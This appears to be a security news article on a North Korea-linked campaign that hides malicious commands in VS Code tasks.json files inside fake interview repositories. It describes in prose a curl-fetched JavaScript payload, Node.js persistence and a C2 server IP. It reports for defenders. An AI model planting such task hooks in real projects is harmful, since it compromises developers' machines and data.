Cyber actors linked to North Korea continue to develop and expand their capacity to conduct attacks by weaponizing one of the world’s most prevelant code editor platforms: Microsoft Visual Studio Code.
In the case of the Contagious Interview campaign, the trend has taken a rather significant change over time, transforming from standard social engineering styles to targeting the developer community using trusted development environments.
This approach represents an alarming increase in the methods used by adversaries to employ authentic software instruments for the delivery of complex malware to the victims' systems.
The entire attack chain starts with developers inadvertently cloning malicious repositories under disguise, often recruitment tasks or technical interviews.
This attack appears to mark a change of tactic compared to previously documented ClickFix based delivery tactics. This is because, unlike previous ClickFix attacks, which relied on dubious emails with links, this attack uses malicious command insertion within configuration files used by Visual Studio Code.
In other words, when a victim opens a compromised repository with Visual Studio Code and gives permission to trust a repository a typical step within code repositories, Visual Studio Code will automatically parse its tasks.json configuration file.
This file has the capability to store embedded commands that will allow arbitrary code to be executed on the system in a way that bypasses user awareness.
An additional form of abuse in Task configuration files was detected by the analysts and researchers at Jamf in December, in which dictionary files contained heavily obfuscated JavaScript code.
This JavaScript code will automatically execute behind the scenes when a malicious actor visits a malicious repository. Another important thing the security researchers noted was their documentation of how attackers used advanced and complex methods of evading detection and analysis.
The Infection Mechanism and Execution Flow
The mode of infection starts when an infected developer clones an infected and opened malicious repository on either GitHub or GitLab.
For macOS operating systems, malware incorporates a background shell command using nohup bash and curl to execute a remote download of a JavaScript payload from Vercel infrastructure.
The code will be carried out directly in the Node.js runtime, thus continuing with the attack notwithstanding the closure of Visual Studio Code.
This method of persistence is especially effective as it occurs outside the process of the editor's code.
Once executed, the JavaScript code will establish a permanent connection back to a command and control server located at 87.236.177.93, beaconing every five seconds.
In this case, this malware collects system information such as hostname, MACs, and operating system information before transmitting this information to hackers to undertake further tasks.
This payload maintains a constant functionality loop that awaits any possible JavaScript related command inputs from its corresponding C2 Server, facilitating the attacks on arbitrary executed codes.
Also, they should analyze repository contents before they are identified as trusted; they should also analyze the layout of tasks.json to look for suspicious configurations.
👉🏻 Found this article interesting? Follow us on Facebook, Twitter and whatsapp to read more exclusive content we post.
